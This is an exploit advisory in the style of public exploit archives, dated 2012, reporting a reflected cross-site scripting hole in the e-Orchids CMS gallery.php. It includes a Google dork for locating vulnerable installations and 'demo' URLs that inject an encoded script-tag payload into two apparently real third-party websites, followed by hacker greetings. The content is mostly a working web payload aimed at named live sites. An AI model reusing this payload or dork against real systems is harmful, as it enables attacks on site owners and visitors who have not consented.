# Exploit Title: e-Orchids cms Cross site Scripting Vulnerability # # Google Dork: Intext:"Powered by e-Orchids" # # Date: 08/29/2012 # # Author: Crim3R # # Site : Http://Ajaxtm.com/ # # Vendor Home : http://www.e-orchids.com/ # # Tested on: all # ================================== [+] gallery.php is Vulnerable to xss [+] gallery.php/[htmlcode]/ D3m0: http://samssat.in/gallery.php/%22%3E%3Cscript%3Ealert(0);%3C/script%3E http://chennaionweb.com/vidyaratnaschool/gallery.php/%22%3E%3Cscript%3Ealert(0);%3C/script%3E ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369